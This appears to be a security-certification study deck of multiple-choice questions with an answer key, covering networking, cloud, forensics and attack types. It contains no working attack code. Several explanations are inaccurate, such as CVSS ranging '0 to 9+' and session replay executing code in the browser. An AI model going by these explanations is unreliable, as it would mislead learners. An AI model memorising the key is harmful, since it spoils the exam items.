-Sensitive (A sensitive label is usually used in the context of personal data. This is privacy-sensitive information about a subject that could harm them if made public and could prejudice decisions made about them.)
Routine analysis of technical security controls at an organization prompts a need for change. One such change is the addition of Network Intrusion Detection System (NIDS) technology. A firewall that supports this function is on order. Considering how the organization will implement NIDS, what other technology completes the solution? -Static code analyzers -Correlation engines -Sensors -Aggregation switches
-Sensors (Sensors gather information to determine if the data being passed is malicious or not. The internet-facing sensor will see all traffic and determine its intent. The sensor behind the firewall will only see filtered traffic. The sensors send findings to the NIDS console.)
An organization receives numerous negative reviews on social media platforms in response to a recent public statement. Experts use machine learning to identify any threatening language. Which approach do the experts use to identify security risks? -Security monitoring -Sentiment analysis -Threat feeds -User behavior analysis
-Sentiment analysis (Sentiment analysis is used to monitor social media for incidents, such as disgruntled consumers posting negative content. In terms of security, this can be used to gather threat intelligence.)
In regards to performing forensic investigation in public clouds, what document would contain the right to audit clause, giving the investigator the authority to audit files on the network? -Forensic reports -Checksums -Service-level agreements (SLA) -Pagefile
-Service-level agreements (SLA) (A Service Level Agreement (SLA) is a formal agreement that lays out the detailed conditions in which the service is rendered. These could include terms and conditions for security access controls and risk evaluations, plus authentication criteria for proprietary and private data.)
A user calls to request assistance connecting to the company's free guest Wi-Fi access point. The user is selecting the correct "Guest WIFI" wireless name from a brand new Windows 10 laptop. How can the user gain proper access to the Internet? -Get a public key certificate -Request to disable AP isolate -Change laptop's connection method -Sign on to the web portal
-Sign on to the web portal (The web portal, also known as a captive portal, is a web page a client is automatically directed to when connecting to a network, usually through public Wi-Fi.)
Select the type of incident response exercise that involves recreating system interfaces or using emulators to allow students to practice configuration tasks, or even practice with other trainees to mimic real-time attack scenarios. -Simulations -Tabletop -Walkthrough -Capture the Flag
-Simulations (Simulation is an activity in which two teams replicate a scenario and play the scenario out on real hardware, with one team representing the attackers, and the other team representing the response team.)
A developer uses a prepackaged set of tools that includes documentation, application programming interfaces (APIs), code samples, and libraries to easily integrate an application with the company Linux operating system. Which secure coding process is the developer using? -Code reuse -APIs -Stored procedure -Software development kit (SDK)
-Software development kit (SDK) (A software development kit (SDK) provides developers a prepackaged set of tools, libraries, documentation, and code samples to create software applications on a specific platform.)
An organization configures virtual network appliances as part of an infrastructure as code (IaC) deployment. What approach handles the near real-time collection, aggregation, and reporting of data of the implementation? -Software-defined networking (SDN) -Network controller application APIs -Software-defined visibility (SDV) -Network functions virtualization (NFV)
-Software-defined visibility (SDV) (Software-defined visibility (SDV) supports assessment and incident response functions. Visibility is the near real-time collection, aggregation, and reporting of data about network traffic.)
Which attack is a brute-force type that mixes common passwords with usernames? -Dictionary -Spraying -Skimming -Rainbow
-Spraying (Password spraying is a horizontal brute-force online attack. The attacker chooses one or more common passwords (for example, password) and tries them in conjunction with multiple usernames.)
A test team performs an in-depth review of completed code and analyzes its compatibility with the environment it will be deployed to. Which of the following environments is the test occurring in? -Test -Staging -Production -Development
-Staging (A staging environment mimics that of a production environment. It is used for dynamic analysis of an application in a complete but separate production-like environment.)
Experts at a scientific facility suspect that operatives from another government entity have planted malware and are spying on one of their top-secret systems. Based on the attacker's location and likely goals, which attacker type is likely responsible? -Script kiddies -State actors -Criminal syndicates -Hacktivists
-State actors (State actors have been implicated in many attacks, particularly on energy and health network systems. They typically work at arm's length from the national government that sponsors and protects them, maintaining "plausible deniability.")
Which of the following practices would help mitigate the oversight of applying coding techniques that will secure the code of an internal application for a company? -Normalization -Input validation -Dead code removal -Static code analysis
-Static code analysis (Static code analysis is the manual review of code to identify oversights, mistaken assumptions, or a lack of knowledge or experience. This may ensure security or improve the code depending on who is peer-reviewing it.)
A stratum 2 time server obtains routinely updated time to ensure accuracy. Evaluate the Network Time Protocol (NTP) and conclude which device provided the updates. -Stratum 2 -Stratum 3 -Atomic Clock -Stratum 1
-Stratum 1 (A stratum 2 server would obtain the time from a stratum 1 server. The higher level server must always receive the time.)
A recent attack on a major retail chain reported that customers' private information, including credit card information, was stolen. The report explained that a heating, ventilation, and air conditioning (HVAC) contractor copied the information to an external hard drive while servicing an air conditioner unit, and later uploaded the data to a cloud storage resource. A security engineer would classify this type of attack as which of the following? -Cloud-based attack -USB cable attack -Birthday attack -Supply chain attack
-Supply chain attack (A supply chain attack involves a threat actor seeking methods to infiltrate a company in its supply chain. A heating, ventilation, and air conditioning (HVAC) supplier is one example of using a maintenance service to gain access to sensitive areas like a datacenter.)
Which type of service account has the most privileges? -Local service -Group service -System -Network service
-System (The System account has the most privileges of any Windows account. This account creates the host processes and systems that receive full privileges to local computers. Local service accounts have the same privileges as standard user accounts.)
A tech considers installing either a Raspberry Pi or Arduino system inside a small enclosure as a control device for sensitive tasks. The utilization of this technology is an example of which embedded system type? -Programmable Logic Controller (PLC) -Field Programmable Gate Array (FPGA) -System on Chip (SoC) -Real-Time Operating System (RTOS)
-System on Chip (SoC) (System on chip (SoC) is a design where processors, controllers, and devices are provided on a single processor die (or chip). Raspberry Pi and Arduino are examples of SoC boards.)
A network administrator researched Secure Sockets Layer/Transport Layer Security (SSL/TLS) versions to determine the best solution for the network. Security is a top priority along with a strong cipher. Recommend the version to implement, which will meet the needs of the company. -SSL 2.0 -SSL 3.0 -TLS 1.2 -TLS 1.1
-TLS 1.2 (Transport Layer Security (TLS) 1.2 added support for the strong Secure Hash Algorithm (SHA)-256 cipher along with improvements to the cipher suite negotiation process and protection against known attacks.)
A network tech is installing an intrusion detection system (IDS) on a corporate network. The system is intended to be a long-term monitoring solution and would ideally split or copy network signals on the physical layer to avoid frame loss. Anticipate the type of sensor the tech will install in conjunction with the IDS. -Test access point (TAP) -SNMP trap -Bandwidth monitor -SPAN (switched port analyzer)
-Test access point (TAP) (A test access point (TAP) is a device that copies signals from the physical layer and the data link layer. Since no network or transport logic is used, every frame is received, allowing reliable packet monitoring.)
In what way does Challenge Handshake Authentication Protocol (CHAP) protect against replay attacks? -The handshake is repeated with different challenge messages periodically throughout the session connection. -Mutual authentication is performed every time the handshake is initiated and repeated throughout the session. -The challenge is different every time a user authenticates to the server. -The client responds with a hash calculated from the server challenge message and a shared secret.
-The handshake is repeated with different challenge messages periodically throughout the session connection. (In CHAP, the handshake is repeated with different challenge messages throughout the session, which updates the session timestamp and guards against replay attacks.)
A company is looking into integrating on-premise services and cloud services with a cloud service provider (CSP) using an Infrastructure as a Service (IaaS) plan. As a cloud architect works on architectural design, which of the following statements would NOT apply in this case? -The provider must update the firmware and security patches of physical servers. -The provider is responsible for the availability of the software. -The company is liable for legal and regulatory requirements for customer data. -The company must establish separation of duties mechanisms.
-The provider is responsible for the availability of the software. (In a Software as a Service (SaaS) plan, the provider is responsible for the availability of the software. The software may include an appliance with Windows Server 2016 already installed and available to use.)
Auditing SIP (Session Initiation Protocol)-based VoIP logs can reveal evidence of Man-in-the-Middle attacks. When handling requests, what do the call manager and any intermediate servers add to the SIP log file? -A hop count -Their own IP address -A list of IP addresses of previous hops -The IP address of the intended recipient
-Their own IP address (When managing requests, the call manager and all other intermediate servers add their IP address via the log header. The logs will show details of any Man-in-the-Middle attacks in which an unauthorized proxy intercepts data.)
Two employees use Instant Messaging (IM) in separate buildings at work. They change the communications over to a video call with one click. Compare the types of communication services and determine which service the employees used. -Unified Communications -Voice over Internet Protocol -Video Teleconferencing -Web Conferencing
-Unified Communications (The project managers are utilizing Unified Communications (UC). These solutions are messaging applications that combine multiple communications channels and technologies into a single platform. These communications channels can include voice, messaging, interactive whiteboards, data sharing, email, and social media.)
A user reported that their Excel spreadsheets delete everything except the active sheet when running a recorded task called "Unhide worksheets" on a workbook. Command prompts have also been popping up on the Windows workstation when it restarts. If the workstation was legitimately compromised, how would an attacker maliciously reconfigure a recorded task on an Excel workbook? -Using Python commands -Using macro commands -Using PowerShell commands. -Using bash commands
-Using macro commands (A document macro is a sequence of actions performed in the context of a word processor, spreadsheet, or presentation file. This can be recorded and re-recorded in the application to change the outcome of the named task.)
What purpose does the Linux command chmod serve? -It displays the contents of a file. -Views or changes read and write permissions for a file or directory. -It transfers the file newFile from a server to a local drive. -Performs string-match search with regex syntax.
-Views or changes read and write permissions for a file or directory. (The chmod can also change special mode flags.)
An administrator collects server logs and decides to normalize them into a standard format for reporting. Which option does the administrator use to accomplish this? -rsyslog -nxlog -journalctl -syslog
-nxlog (NXlog is an open-source log normalization tool. One use is to collect Windows logs, which use an XML-based format and normalize them to a syslog format.)
Outline possible tools or methods the team can use to acquire a disk image from a system. (Select all that apply.) []Transfer file system via SMB []Create snapshots of all volumes []Save disk image with FTK Imager []Copy disk with dd command
[]Create snapshots of all volumes (It is possible to create snapshots of the compromised volumes, and in some cases, it can boot a virtual machine, as a full disk image can. This may not be the most efficient method, however.) []Save disk image with FTK Imager (FTK Imager is a data imaging tool that quickly assesses electronic evidence to determine if it requires further analysis. The FTK Imager can save an image of a hard disk in one file or in segments, to reconstruct later if needed.) []Copy disk with dd command (The dd command can copy an entire disk as an image to a USB thumb drive. The team can then analyze the image in a sandbox environment.)
A small business was robbed, and several workstations were stolen. The business stored customer data within a plain spreadsheet on one of the stolen workstations. Customer data and other business files are restored from an external hard drive soon after. Describe the issues that the business faced during this trying time. (Select all that apply.) []Business had a privacy breach. []Customer data was permanently lost. []Customer identity was not stolen. []Data was exfiltrated from the office.
[]Business had a privacy breach. (A privacy breach is where personal data is not collected, stored, or processed in full compliance with the laws or regulations governing personal information. A plain spreadsheet and a computer with no encryption capability are not enough security to hold sensitive data.) []Data was exfiltrated from the office. (Data exfiltration is the methods and tools an attacker uses to take data without authorization from the victim's systems. The data can be physically taken or transferred to an external network or media.)
A web administrator notices a few security vulnerabilities that must be addressed on the company Intranet. The portal must force a secure browsing connection, mitigate script injection, and prevent caching on shared client devices. Determine the secure options to set on the web server's response headers. (Select all that apply.) []Content Security Policy (CSP) []Cache-Control []HTTP Strict Transport Security (HSTS) []Secure Cookies
[]Content Security Policy (CSP) (Content Security Policy (CSP) is a header option that mitigates clickjacking, script injection, and other client-side attacks.) []Cache-Control (Cache-Control is a header option that sets whether the browser can cache responses. Preventing data caching protects confidential and personal information where the client device is shared by multiple users.) []HTTP Strict Transport Security (HSTS) (HTTP Strict Transport Security (HSTS) is a header option that forces the browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping.)
Management is planning a secure network design for corporate mobile devices given to remote employees. One security suggestion involves only allowing corporate apps to access the corporate network when the mobile device is connected via a virtual private network (VPN). Which of the following will support this design? (Select all that apply.) []Context-aware authentication []Unified endpoint management []Security-enhanced Android []Mobile application management
[]Context-aware authentication (Context-aware authentication can, for example, disable screen locks when the mobile device is in a trusted location, such as a home. It can also check whether the network connection is trusted before allowing apps to communicate externally.) []Unified endpoint management (Unified Endpoint Management (UEM) is a suite of applications and features that extends the concept of network access control (NAC) solutions to the mobile device. UEM may include MAM.) []Mobile application management (Mobile Application Management (MAM) sets policies for apps that can process corporate data and prevents data transfer to personal apps. This type of solution configures an enterprise-managed container or workspace.)
Suggest a way to maximize the integrity of the analysis process to ensure non-repudiation is possible. (Select all that apply.) []Perform the analysis as quickly as possible to keep evidence fresh. []Create a hash before and after analysis and compare the checksums. []Use a write blocker during analysis to prevent data from being changed. []Perform the analysis with a group of witnesses present.
[]Create a hash before and after analysis and compare the checksums. (By creating an MD5 or SHA hash immediately, the analyst can perform the analysis and create a second hash afterward. The checksum of the second hash can then be validated by the first hash, confirming the disk's contents were not tampered with.) []Use a write blocker during analysis to prevent data from being changed. (Connecting to a device equipped with a write blocker will prevent any additional data from being written to the disk during the copy.)
Which attack types are client-side attacks that are impacted by malicious code? (Select all that apply.) []Cross-site scripting []Session replay []Directory traversal []Integer overflow
[]Cross-site scripting (A cross-site scripting (XSS) attack exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit.) []Session replay (A session replay is a client-side attack. This means that the attack executes arbitrary code on the user's browser.)
An application's appliance template virtual machine (VM) is running on the production network. A Linux administrator logs in to the system as the default root account to verify network settings. The appliance was deployed "out of the box" and is running healthy. A security engineer would have some concerns about which of the following configurations? (Select all that apply.) []Traffic over port 443 []Application logging errors []Default template settings []Log on as superuser
[]Default template settings (Default template virtual machines or appliances are susceptible to hackers because their baseline settings and credentials may be publicly available. Systems should be secured immediately after deployment.) []Log on as superuser (A superuser account, such as the root account on a Linux system, has no restrictions over system access. These accounts should be secured by disabling them and creating new admin accounts or groups.)
Unlike transport layer security (TLS), internet protocol security (IPSec) can use two modes. One mode encrypts only the payload of the IP packet, leaving the IP address unencrypted. The other mode encrypts the whole IP packet and adds a new IP header. What are these modes? (Select all that apply.) []Transport []Tunnel []Stateful []Stateless
[]Transport (IPsec uses the transport mode to provide encrypted communication by only encrypting the payload. Private networks mostly use this method.) []Tunnel (IPsec uses the tunnel mode to provide encrypted communication by encrypting the entire network packet. Unsecured networks mostly use this method.)
A network administrator can conduct a site survey to find potential placement locations of wireless access points (WAP) using which of the following? (Select all that apply.) []Wireless controller []Heat map []Wi-Fi Protected Setup (WPS) []Wi-Fi analyzer
[]Heat map (A heat map is a visual of the information gathered from a Wi-Fi analyzer. It can show where a signal is strong (red) or weak (green/blue), and which channel is being used.) []Wi-Fi analyzer (A Wi-Fi analyzer is software on a laptop or mobile device with a wireless network adapter. Information about the signal is obtained at regularly spaced points as the surveyor moves around.)
Multiple private data sources ingest pictures to a machine learning tool on Google Cloud Platform to find specific species of butterflies. The pictures are tagged by creator names in the company before being loaded onto the various data source locations. What type of security solution can the IT team implement to prevent tainted training data from getting to the machine learning tool? (Select all that apply.) []Keep ML algorithm a secret. []Use algorithms that use collision avoidance. []Prevent infiltration of external vendors. []Use SOAR to check picture properties
[]Keep ML algorithm a secret. (Machine Learning (ML) algorithm is secrecy by obscurity. An adversarial attack can skew image data by tricking the ML tool to recognize an image as something else if the algorithm is known.) []Use SOAR to check picture properties (Security orchestration, automation, and response (SOAR) and automated runbooks could effectively check saved pictures before they are ingested into the machine learning tool. This will prevent malicious data from being ingested.)
Which type of certificate does Secure Multipart Internet Message Extensions (S/MIME) NOT use to sign a message? (Select all that apply.) []Machine certificate []Email certificate []User certificate []Root certificate
[]Machine certificate (Machine certificates are used to identify servers, PCs, smartphones, and other network devices. This allows devices to trust other devices on the network.) []User certificate (User certificates are used in a directory-based network for a wide range of use cases. In Active Directory (AD), there are user certificate templates for standard users, administrators, smart card logon/users, and recovery agent users.) []Root certificate (The root certificate is the one that identifies the Certificate Authority (CA) itself. The root certificate is self-signed.)
Which of the following will reduce the risk of data exposure between containers on a cloud platform? (Select all that apply.) []Secrets management []Namespaces []Control groups []Public subnets
[]Namespaces (In a container engine such as Docker, each container is isolated from others through separate namespaces. Namespaces prevent one container from reading or writing processes in another.) []Control groups (Control groups ensure that one container cannot overwhelm others in a DoS-type attack. Namespaces and control groups reduce the risk of data exposure between containers.)
An organization remodels an office which results in the need for higher security during construction. Placing a security guard by the data center utilizes which control types? (Select all that apply.) []Compensating []Preventative []Operational []Corrective
[]Operational (Operational control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls.) []Preventative (A preventative control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place.)
An organization suffers a breach and learns a lesson in the proper approach of maintaining archived data. An engineer writing a report focuses on which areas? (Select all that apply.) []Retention policies []Attack walkthrough []Lessons learned []Response plan
[]Retention policies (A retention policy refers to the safe storage and archiving of live or backed up data. A retention policy should be a proactive measure and not a reactive one.) []Lessons learned (Lessons learned address the incident and responses to identify whether procedures or systems could be improved. The need for an improved retention policy is an example.)
Users in a company complain that they cannot reach internal servers when using WiFi. IT discovers that the SSID of the broadcasted network is similar to the company's but is not legitimate. IT plans on searching the network to remove which disruptive technologies? (Select all that apply.) []Jamming attack []Rogue access point []Evil twin []Disassociation attack
[]Rogue access point (A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not.) []Evil twin (A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one.)
A security consultant recently audited a company's cloud resources and web services. The consultant found ineffective secrets management and a lack of input validation mechanisms. What type of attack would the company's cloud resources be susceptible to at its current state? (Select all that apply.) []SQL injection []Client-side request forgery []API attack []Resource exhaustion
[]SQL injection (A Structured Query Language (SQL) injection modifies basic functions by adding code to some input accepted by an application to execute the attacker's own set of SQL queries. Input validations can prevent this type of attack.) []API attack (Application Programming Interfaces (APIs) allow consumers to automate tasks on a web or cloud resource. Ineffective secrets management could compromise these services on a wide scale if the threat actor retrieves API keys.) []Resource exhaustion (Resource exhaustion uses privilege access to deplete resources such as writing thousands of files to disk. Ineffective secrets management can cause these types of malicious processes.)
An increase in malware detection, due to certain web browsing activity in the workplace, caused the information systems security office (ISSO) to deploy a unified threat manager on the network. How would this network appliance help reduce malware on client workstations? (Select all that apply.) []Scan web traffic []Block malware []Block URLs []Encrypt traffic
[]Scan web traffic (Many UTM appliances include a malware scanner that scans the web traffic and compares the packet or heuristic behavior to determine if a network connection is malicious.) []Block malware (A UTM is like an intrusion prevention system (IPS) that can block network connections or prevent a file from downloading.) []Block URLs (The UTM (Unified Threat Management) is an all-in-one security appliance. Its ability to block specific URLs or websites comes from its content filtering feature. Even unknown websites that fit the description of having inappropriate images can be set to block.)
Network administrators are configuring a demilitarized zone (DMZ) to provide Internet-facing services to customers. These admins will perform minimum configuration and security to rapidly deploy two web servers that are load balanced. Which of the following will most likely be configured in this DMZ? (Select all that apply.) []Scheduling algorithm []Zero trust []Bastion hosts []Virtual IP addresses
[]Scheduling algorithm (The scheduling algorithm is the code and metrics that determine which node is selected for processing each incoming request. For example, round robin.) []Bastion hosts (Bastion hosts are any servers that are configured with minimal services to run in a demilitarized zone (DMZ). A bastion host would not be configured with any data that could be a security risk to the internal network.) []Virtual IP addresses (Virtual Internet Protocol (IP) addresses are public IP addresses that are shared among a load-balanced cluster of servers. The primary node will receive traffic from the virtual IP address until the secondary node takes over.)
A vulnerability database loaded on a scanning tool such as Tenable Nessus will commonly show which of the following properties? (Select all that apply.) []Packet data []Score []Dictionary []Security data inputs
[]Score (Common Vulnerability Scoring System (CVSS) is maintained by the Forum of Incident Response and Security Teams (first.org/cvss). Scores range from 0 (low) to 9+ (critical).) []Dictionary (Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in published operating systems and applications software provided by cve.mitre.org. It includes CVE ID, brief descriptions, a URL reference list, and data of entry.)
A gray hat hacker will perform which of the following when using hacking techniques on an organization or software? (Select all that apply.) []Move laterally on the network. []Seek a bug bounty []Cleanup evidence []Use a white box
[]Seek a bug bounty (A gray hat hacker will try to find vulnerabilities in a product or network without seeking the approval of the owner. They often seek voluntary compensation like a bug bounty.) []Cleanup evidence (A gray hat hacker will clean up evidence of an attack like a backdoor because an exploit will never be used as extortion. This is also true for white hat hackers.)
What is an antivirus and anti-malware software capable of doing to protect a computer system? (Select all that apply.) []Signature-based detection []Detect Trojans []Disk encryption []Application-aware filtering
[]Signature-based detection (The first generation of antivirus (AV) software is characterized by signature-based detection and prevention of known viruses. Computer viruses are computer programs that replicate, when executed, by modifying and inserting themselves into other computer programs.) []Detect Trojans (Anti-malware is the next generation of antivirus software that can detect other malicious software such as Trojans, spyware, and even cryptojackers.)
A cloud service provider (CSP) dashboard provides a view of all applicable logs for cloud resources and services. When examining the application programming interface (API) logs, the cloud engineer sees some odd metrics. Which of the following are examples that would concern the engineer? (Select all that apply.) []Average error rate of 78% []High native-cloud firewall cost []Low latency responses []Spike in API calls
[]Spike in API calls (An unexplained spike in Application Programming Interface (API) calls could be an indicator of a DDoS attack. This metric is captured in requests per second or per minute.) []Average error rate of 78% (Error rates measure the number of errors as a percentage of total calls, usually classifying error types under category headings. High errors may represent an overloaded system or security issue.)
Identify the concepts that function as alternatives to kill chain life cycle analysis in threat intelligence. (Select all that apply.) []Continuity of operation planning (COOP) []The Diamond Model of Intrusion Analysis []Incident response plans []MITRE ATT&CK
[]The Diamond Model of Intrusion Analysis (The Diamond Model of Intrusion Analysis is a framework that analyzes intrusion events by examining relationships between four core features and can be utilized as an alternative to the cyber kill chain.) []MITRE ATT&CK (The MITRE ATT&CK framework stands for Adversarial Tactics, Techniques, and Common Knowledge. It is a database of known TTPs (tactics, techniques, procedures) that can function as an alternative to the cyber kill chain.)
A security expert uses a technical approach to configure a detective control to monitor a server. Review the descriptions and determine which controls the expert implements. (Select all that apply.) []Psychologically discourages an attacker []The control is implemented as a system []Implemented primarily by people []Records attempts at intrusion
[]The control is implemented as a system (A technical control is implemented as a system (hardware, software, or firmware). For example, firewalls, anti-virus software, and OS access control models are technical controls.)
Security admins are evaluating Windows server vulnerabilities related to Dynamic Link Library (DLL) injections. Modern applications are running on these Windows servers. How would an attacker exploit these vulnerabilities? (Select all that apply.) []Use malware with administrator privilege. []Evade detection through refactoring. []Navigate laterally using pass the hash. []Enable legacy mode through shimming.
[]Use malware with administrator privilege. (Dynamic Link Library (DLL) injection is deployed with malware that is already operating on the system with local administrator or system privileges.) []Evade detection through refactoring. (The malware must evade detection by anti-virus to be successful. This can be done through code refactoring which means the code performs the same function by using different methods, such as changing its signature.)
Which wireless configuration provides the most up-to-date and secure way of connecting wireless devices to an office or home network? (Select all that apply.) []EAP-TTLS []WPA3 []SAE []PEAP
[]WPA3 (Wi-Fi Protected Access 3 (WPA3) is the most up-to-date wireless specification that provides security features and mechanisms that improve the weaknesses of WPA2.) []SAE (Simultaneous Authentication of Equals (SAE) is a feature of WPA3. It replaces WPA's 4-way handshake authentication and association mechanism with a protocol based on the Diffie-Hellman key agreement.)
While assisting a customer over the phone to connect a laptop to a new wireless router, the user suddenly reports it is connected. Upon further inquiry into how the connection occurred, the user stated they pushed a circular button. Analyze the situation and determine which button the user pressed, and how it functions. (Select all that apply.) []WPS []8-character PIN []Authentication server []Wireless password
[]WPS (WPS or Wi-Fi Protected Setup works with multiple compatible devices, like a printer, where the WPS button is pushed to establish a connection.) []8-character PIN (Activating WPS on the wireless router and the adapter simultaneously associates the devices using an 8-digit PIN, then associate the adapter with the access point using WPA2. The system generates a random Service Set Identifier (SSID) and Pre-shared Key (PSK).)
Select the tools with which an attacker can identify misconfigured DNS servers with which a zone transfer can be performed, compromising the records of all hosts in a domain. (Select all that apply.) []tcpdump []dig []nslookup/dig []curl
[]dig (An attacker may test a network using dig on Linux systems to find out if the DNS service is misconfigured.) []nslookup/dig (Querying name records for a given domain using a particular DNS resolver under Windows can be done with nslookup.)
An Information Security Manager working for an ISP has discovered that an attacker has poisoned the DNS server cache by spamming it with recursive queries. Predict what tools the manager might use to discover whether the attacker has inserted any false records. (Select all that apply.) []tcpreplay []nslookup/dig []dnsenum []Memdump
[]nslookup/dig (The nslookup (or dig tool in Linux) can query the name records and cached records held by a server to discover whether an attacker has inserted any false records.) []dnsenum (dnsenum packages a number of tests into a single query, as well as hosting information and name records. dnsenum can try to work out the IP address ranges that are in use.)